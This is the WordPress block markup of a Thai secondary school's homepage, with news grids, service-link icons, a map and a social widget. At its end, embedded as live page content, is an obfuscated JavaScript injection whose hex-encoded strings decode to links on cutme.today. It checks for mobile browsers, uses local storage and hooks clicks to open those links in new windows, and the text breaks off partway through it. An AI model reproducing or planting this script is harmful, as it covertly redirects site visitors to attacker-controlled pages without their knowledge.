{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbx8vhSZ2IZZIqxeIQpcNcDQMtHhuL6ppC6NHe1TCt3qNz8AN7zlht9tFDiy-VGBRXPjsw/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 